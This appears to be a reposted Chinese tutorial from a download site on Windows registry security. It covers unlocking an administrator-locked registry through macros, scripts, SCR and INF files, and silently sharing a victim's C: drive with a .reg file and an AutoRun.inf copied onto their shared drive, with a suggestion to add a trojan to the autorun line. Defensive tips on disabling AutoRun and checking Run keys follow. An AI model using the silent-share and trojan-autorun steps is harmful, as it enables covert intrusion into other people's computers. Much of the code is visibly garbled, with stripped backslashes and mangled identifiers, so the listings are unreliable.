IT貓撲網(wǎng):您身邊最放心的安全下載站! 最新更新|軟件分類|軟件專題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置:首頁操作系統(tǒng)windows → 精簡注冊表高級用法——安全篇

精簡注冊表高級用法——安全篇

時(shí)間:2015/6/28來源:IT貓撲網(wǎng)作者:網(wǎng)管聯(lián)盟我要評論(0)

筆者發(fā)現(xiàn)現(xiàn)在介紹注冊表的書籍的重點(diǎn)內(nèi)容都講解注冊表關(guān)于個(gè)性化設(shè)置和系統(tǒng)優(yōu)化等部分,而對于現(xiàn)實(shí)網(wǎng)絡(luò)環(huán)境下日益猖獗的"黑客"行為、木馬病毒以及那些令人惡心的惡意網(wǎng)站卻關(guān)注甚少。筆者在此就注冊表有關(guān)安全內(nèi)容略加闡述,希望能起拋磚引玉之效。

  一、注冊表與"黑客"行為

  "黑客"利用注冊表主要包括:

  A:突破部分網(wǎng)管軟件限制

  B:共享特定硬盤分區(qū)并運(yùn)行指定程序

  C:啟動(dòng)黑客程序等三方面,而其中又屬B、C兩方面危害較大。

  1、突破部分網(wǎng)管軟件限制

  現(xiàn)在流行的網(wǎng)管軟件基本上都可以對PC機(jī)采取隱藏桌面和硬盤特定分區(qū)、禁止修改IE瀏覽器、隱藏"開始"工具欄,封鎖注冊表編輯器regedit.exe等諸多限制,有的網(wǎng)吧管理員甚至到了變態(tài)的地步。于是"自由的戰(zhàn)士"便開始利用注冊表進(jìn)行大突圍。
570_2004110309260650342600.gif
  word也可以給注冊表解鎖?沒錯(cuò)!我們利用的是微軟在Word中提供的"宏",沒想到吧?具體方法是:運(yùn)行Word,然后編寫如下面所示的這個(gè)"Unlock"宏,即可給注冊表解鎖:

  Sub Unlock()

  Dim RegPath As String

  RegPath="HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"

  System.PrivateProfileString(FileName:="",Section:=RegPath,Key:="Disableregistrytools")="OK!"

  End Sub

  ③用t、vbt腳本語言解鎖

  腳本語言解鎖注冊表,這個(gè)沒的說,很多惡意網(wǎng)站就是靠它來鎖住我們的注冊表,現(xiàn)在我們反其道行之用它來解鎖注冊表。這里只給出t的核心代碼。用記事本編輯如下內(nèi)容的文件,保存為以.js為后綴名的任意文件,使用時(shí)雙擊就可以了。

  VAR WSHShell=WT.CREA-TOBJEt("WT.SHELL");

  WSHShell.Popup("解鎖注冊表");

  WSHShell.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies

  systemDisableRegistryTools", 0,"reg_dword");

  需要注意:用JS對鍵值進(jìn)行操作時(shí)要用兩斜杠"",并且要用";"表示結(jié)束.

 、芾肧CR文件給注冊表解鎖

  眾所周知,SCR文件是屏保文件,SCR文件如何用來解鎖注冊表呢?方法是將注冊表編輯器regedit.exe改名為Regedit.scr。然后,在桌面上點(diǎn)擊鼠標(biāo)右鍵,在彈出菜單中選擇"屬性",在彈出的"顯示屬性"對話框中選中"屏幕保護(hù)程序",在"屏幕保護(hù)程序"下拉列表框中找到Regedit這個(gè)"屏保文件"(圖1),最后點(diǎn)擊"預(yù)覽"按紐,你會(huì)發(fā)現(xiàn)注冊表編輯器成功地打開了。再更改相關(guān)鍵值,重啟計(jì)算機(jī)后就可以給注冊表解鎖了。ㄓ浿裇CR文件改回哦。
570_2004110309260653249000.gif
⑤用INF文件解鎖

  
  在Windows中有一種后綴為INF的驅(qū)動(dòng)安裝文件,它實(shí)際上是一種腳本語言,通過解釋來執(zhí)行。它包含了設(shè)備驅(qū)動(dòng)程序的所有安裝信息,其中也有涉及修改注冊表的相關(guān)語句,所以我們也可以利用INF文件對注冊表解鎖。

  [Version]

  Signature="$CHICAGO$"

  [DefaultInstall]

  DelReg=UnLock

  [UnLock]

  HKCU,SoftwareMicrosoftWindowsCurrentVersionPolicies

  System,Disableregistrytools,

  1,00,00,00,00

  將上面的內(nèi)容另存為后綴名是.inf的文件,使用時(shí)只要右鍵點(diǎn)擊它,在彈出菜單中選擇"安裝"即可給注冊表解鎖(如圖2)。
570_2004110309260656224500.gif
首先我們打開記事本編輯reg文件如下:

  

  REGEDIT4

  [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

  CurrentVersionNetworkLanmanC$]

#p#副標(biāo)題#e#

  //這里我只共享了C盤,需要的可以再加

  "Path"="C:"

  "Remark"=" "

  "Type"=dword:00000000

  "Flags"=dword:00000192

  "Parm1enc"=hex:

  "Parm2enc"=hex:

  然后另存為ShareDrives.reg文件。 再打開記事本,鍵入以下內(nèi)容:

  [AutoRun]

  open=regedit /s ShareDrives.reg // 這里/s參數(shù)作用是導(dǎo)入注冊表信息不顯示任何提示

  再另存為AutoRun.inf文件。

  將這兩個(gè)文件復(fù)制到對方共享出來的驅(qū)動(dòng)盤根目錄下,此后只要雙擊共享出來的驅(qū)動(dòng)盤就會(huì)自動(dòng)將ShareDrives.reg文件導(dǎo)入注冊表,對方重啟系統(tǒng)后C盤也就共享出來了。試想想,我們?nèi)绻?quot;open=…"句后添上木馬名并將已配置好的木馬服務(wù)端一起復(fù)制過去,以后會(huì)怎樣?

  那么如何對付這種攻擊呢?因?yàn)橛脖P根目錄下基本不需要AutoRun.inf文件來運(yùn)行程序,因此我們可以采用一個(gè)一勞永逸的辦法就是將硬盤的AutoRun功能完全關(guān)閉,這樣即使硬盤根目錄下有AutoRun.inf文件,操作系統(tǒng)也不會(huì)運(yùn)行指定的程序。Win98為例,打開注冊表編輯器,找到[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]主鍵,在注冊表編輯器右側(cè)框中可以看到有二進(jìn)制值"NoDriveTypeAutoRun",最后只需要將其數(shù)據(jù)數(shù)值由默認(rèn)的"950000 00"改為"9d 00 00 00"就可以了。其原理我就不在講解了。

  3、啟動(dòng)黑客程序

  利用注冊表啟動(dòng)黑客程序,目的是想每次開機(jī)啟動(dòng)時(shí)自動(dòng)運(yùn)行黑客程序,這同時(shí)也是很多木馬病毒自啟動(dòng)常用的方法之一。普遍的方法是在將黑客程序名及參數(shù)添加到注冊表相應(yīng)的鍵值下,這樣一來,每次開機(jī)時(shí)計(jì)算機(jī)將自動(dòng)加載相應(yīng)的注冊表項(xiàng),進(jìn)而使黑客程序達(dá)到常駐內(nèi)存的目的。另外還有更為隱蔽的方法會(huì)在"注冊表與木馬病毒"部分詳細(xì)介紹。

  下面我們打開注冊表編輯器,查看:

  HKEY_LOCAL_MACHINESoftwareMicrosoft

  WindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_CURRENT_USERSoftwareMicrosoft

  WindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值。

  如果發(fā)現(xiàn)未知不明的鍵值,可很有可能就是非法植入的程序。

  二、注冊表與病毒

  下面我們來看看病毒是如何利用注冊表的。一般,病毒會(huì)利用注冊表來得到系統(tǒng)的基本信息,例如操作系統(tǒng)類型、系統(tǒng)安裝的服務(wù)程序、IE、outlook等應(yīng)用軟件的版本信息等等。這主要是為了探測系統(tǒng)及軟件本身的漏洞然后加以利用。更主要的,病毒是想通過注冊表實(shí)現(xiàn)黑客程序一樣的目的——開機(jī)自啟,常駐內(nèi)存。只有這樣,病毒才能感染其他機(jī)器和文件,才有機(jī)會(huì)進(jìn)行"破壞"。

  打開注冊表編輯器,我們找到:

  HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值。

  大部分病毒都會(huì)悄悄的在上述三個(gè)位置安家。這時(shí)我們只需要?jiǎng)h除相應(yīng)的鍵值再刪除掉病毒程序就可以了。

  此外,病毒還可以把自己注冊為系統(tǒng)服務(wù)來達(dá)到更為隱蔽的開機(jī)自啟的目的。其基本原理是利用在WIN2K中,"啟動(dòng)類型"設(shè)置為"自動(dòng)"的服務(wù),啟動(dòng)時(shí)系統(tǒng)就會(huì)自動(dòng)運(yùn)行,所以,病毒只需將自身添加到系統(tǒng)服務(wù)中,并將"啟動(dòng)類型"設(shè)置為"自動(dòng)"就可以每次啟動(dòng)系統(tǒng)時(shí)都自動(dòng)運(yùn)行病毒程序。其在注冊表中的位置如下:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesServiceNamemeters]

  "Application"= "C:winntsystem32 ServiceName.exe

關(guān)鍵詞標(biāo)簽:注冊表

相關(guān)閱讀

文章評論
發(fā)表評論

熱門文章 windows7虛擬光驅(qū)安裝和使用方法windows7虛擬光驅(qū)安裝和使用方法解決應(yīng)用程序正常初始化(0xc0000135)失敗解決應(yīng)用程序正常初始化(0xc0000135)失敗hosts文件位置以及如何修改hosts文件hosts文件位置以及如何修改hosts文件[聲音故障]XP沒有聲音,丟失Windows Audi[聲音故障]XP沒有聲音,丟失Windows Audi

相關(guān)下載

人氣排行 [聲音故障]XP沒有聲音,丟失Windows Audio服務(wù)(AudioSrv)[警解決Windows 7黑屏的有效方法windows2003中關(guān)于軟路由設(shè)置方法的具體介紹Windows不能在本地計(jì)算機(jī)啟動(dòng)OracleDBConsoleorcl一個(gè)空文件夾刪不掉的解決辦法Windows 7加XP的局域網(wǎng)搭建與文件共享用Windows命令行實(shí)現(xiàn)自動(dòng)SSH代理Windows提示錯(cuò)誤應(yīng)用程序update.exe